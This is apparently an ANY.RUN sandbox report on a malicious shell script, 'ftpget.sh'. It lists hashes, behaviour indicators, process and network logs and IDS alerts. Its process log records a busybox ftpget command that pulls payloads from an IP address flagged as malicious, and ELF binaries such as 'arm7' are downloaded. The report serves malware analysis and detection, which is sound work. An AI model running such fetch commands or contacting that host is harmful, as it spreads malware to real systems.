Malware analysis /ftpget.sh Malicious activity | ANY.RUN

Add for printing

download:	/ftpget.sh
Full analysis:	https://app.any.run/tasks/5885cec5-323e-4293-af66-87e308d9162a
Verdict:	Malicious activity
Analysis date:	August 19, 2024, 09:23:55
OS:	Ubuntu 22.04.2
MIME:	text/x-shellscript
File info:	POSIX shell script, ASCII text executable
MD5:	27A6B644F2EDDDAF94095B7AFCE79D8D
SHA1:	85B4E6D6F06348654A3A55413135E869C7EDCB8C
SHA256:	E9248E2E9503D5E0F056347C95BF3F98B0B2D1085B1710E700C9F982CF91CC4C
SSDEEP:	24:e3mBlb3WBq232FB0g+3zqBCS3oBQ13cBdTCN3jqBpj3VPEBq3uB4bOW:dYW7FC71d+Z6Lwh5W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 12924)
- Connects to FTP
  - busybox (PID: 12930)
  - busybox (PID: 12945)
  - busybox (PID: 12952)
  - busybox (PID: 12976)
  - busybox (PID: 12980)
  - busybox (PID: 12992)
  - busybox (PID: 12997)
  - busybox (PID: 13003)
  - busybox (PID: 13011)
- Connects to unusual port
  - busybox (PID: 12952)
  - busybox (PID: 12945)
  - busybox (PID: 12930)
  - busybox (PID: 12976)
  - busybox (PID: 12980)
  - busybox (PID: 12992)
  - busybox (PID: 12997)
  - busybox (PID: 13003)
  - busybox (PID: 13011)
- Reads /proc/mounts (likely used to find writable filesystems)
  - check-new-release-gtk (PID: 12955)
- Executes commands using command-line interpreter
  - update-notifier (PID: 12953)
- Potential Corporate Privacy Violation
  - busybox (PID: 12980)
  - busybox (PID: 12992)
  - busybox (PID: 12997)
  - busybox (PID: 13011)
  - busybox (PID: 13003)
- Manipulating modules (likely to execute programs on system boot)
  - modprobe (PID: 12990)
  - modprobe (PID: 13001)
  - modprobe (PID: 12995)
  - modprobe (PID: 13009)
  - modprobe (PID: 13014)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.sh	\|	Linux/UNIX shell script (100)

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

278

Monitored processes

64

Malicious processes

1

Suspicious processes

2

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
12923	/bin/sh -c "sudo chown user /tmp/ftpget\.sh && chmod +x /tmp/ftpget\.sh && DISPLAY=:0 sudo -iu user /tmp/ftpget\.sh "	/bin/sh	—	any-guest-agent
User: user Integrity Level: UNKNOWN Exit code: 418
12924	sudo chown user /tmp/ftpget.sh	/usr/bin/sudo	—	sh
User: user Integrity Level: UNKNOWN Exit code: 0
12925	chown user /tmp/ftpget.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
12926	chmod +x /tmp/ftpget.sh	/usr/bin/chmod	—	sh
User: user Integrity Level: UNKNOWN Exit code: 0
12927	sudo -iu user /tmp/ftpget.sh	/usr/bin/sudo	—	sh
User: user Integrity Level: UNKNOWN Exit code: 418
12928	/bin/sh /tmp/ftpget.sh	/tmp/ftpget.sh	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 418
12929	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	ftpget.sh
User: user Integrity Level: UNKNOWN Exit code: 0
12930	/bin/busybox ftpget 154.216.18.196 arc arc	/bin/busybox		ftpget.sh
User: user Integrity Level: UNKNOWN Exit code: 1195
12931	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 482
12932	systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service	/usr/bin/systemctl	—	snapd
User: root Integrity Level: UNKNOWN Exit code: 482

Add for printing

Executable files

0

Suspicious files

5

Text files

9

Unknown types

0

Dropped files

PID	Process	Filename		Type
12955	check-new-release-gtk	/tmp/#6029335 (deleted)		text
		MD5:—	SHA256:—
12955	check-new-release-gtk	/tmp/#6029359 (deleted)		text
		MD5:—	SHA256:—
12955	check-new-release-gtk	/tmp/#6029364 (deleted)		text
		MD5:—	SHA256:—
12955	check-new-release-gtk	/tmp/#6029378 (deleted)		text
		MD5:—	SHA256:—
12955	check-new-release-gtk	/tmp/#6029379 (deleted)		text
		MD5:—	SHA256:—
12955	check-new-release-gtk	/tmp/#6029381 (deleted)		text
		MD5:—	SHA256:—
12955	check-new-release-gtk	/tmp/#6029987 (deleted)		text
		MD5:—	SHA256:—
12955	check-new-release-gtk	/tmp/#6029988 (deleted)		text
		MD5:—	SHA256:—
12955	check-new-release-gtk	/home/user/.cache/update-manager-core/meta-release-lts		text
		MD5:—	SHA256:—
12980	busybox	/home/user/arm7		o
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

2

TCP/UDP connections

36

DNS requests

21

Threats

7

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.98:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
473	NetworkManager	GET	204	185.125.190.48:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	185.125.190.18:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	unknown
470	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.190.98:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	unknown
—	—	91.189.91.98:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	unknown
—	—	195.181.172.6:443	odrs.gnome.org	Datacamp Limited	NL	unknown
12930	busybox	154.216.18.196:21	—	Shenzhen Katherine Heng Technology Information Co., Ltd.	HK	malicious
485	snapd	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	unknown
12930	busybox	154.216.18.196:32296	—	Shenzhen Katherine Heng Technology Information Co., Ltd.	HK	malicious
12945	busybox	154.216.18.196:21	—	Shenzhen Katherine Heng Technology Information Co., Ltd.	HK	malicious
12945	busybox	154.216.18.196:28023	—	Shenzhen Katherine Heng Technology Information Co., Ltd.	HK	malicious

DNS requests

Domain	IP	Reputation
connectivity-check.ubuntu.com	185.125.190.18 185.125.190.17 185.125.190.48 91.189.91.96 185.125.190.98 91.189.91.98 91.189.91.49 91.189.91.97 185.125.190.97 91.189.91.48 185.125.190.96 185.125.190.49 2001:67c:1562::24 2620:2d:4000:1::2a 2620:2d:4000:1::23 2620:2d:4000:1::97 2620:2d:4000:1::22 2001:67c:1562::23 2620:2d:4002:1::196 2620:2d:4000:1::96 2620:2d:4002:1::198 2620:2d:4002:1::197 2620:2d:4000:1::2b 2620:2d:4000:1::98	whitelisted
google.com	142.250.179.174 2a00:1450:400e:802::200e	whitelisted
odrs.gnome.org	195.181.172.6 2a02:6ea0:c000::24	whitelisted
api.snapcraft.io	185.125.188.59	whitelisted
234.100.168.192.in-addr.arpa	—	unknown
changelogs.ubuntu.com	185.125.190.18 2620:2d:4000:1::2a	whitelisted

Threats

PID	Process	Class	Message
12945	busybox	Generic Protocol Command Decode	SURICATA Applayer Wrong direction first Data
12976	busybox	Generic Protocol Command Decode	SURICATA Applayer Wrong direction first Data
12980	busybox	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download
12992	busybox	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download
12997	busybox	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download
13003	busybox	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download
13011	busybox	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download

Add for printing

No debug info

General Info

/ftpget.sh

27A6B644F2EDDDAF94095B7AFCE79D8D

85B4E6D6F06348654A3A55413135E869C7EDCB8C

E9248E2E9503D5E0F056347C95BF3F98B0B2D1085B1710E700C9F982CF91CC4C

24:e3mBlb3WBq232FB0g+3zqBCS3oBQ13cBdTCN3jqBpj3VPEBq3uB4bOW:dYW7FC71d+Z6Lwh5W

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

SUSPICIOUS

Modifies file or directory owner

Connects to FTP

Connects to unusual port

Reads /proc/mounts (likely used to find writable filesystems)

Executes commands using command-line interpreter

Potential Corporate Privacy Violation

Manipulating modules (likely to execute programs on system boot)

INFO

Malware configuration

Static information

TRiD

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings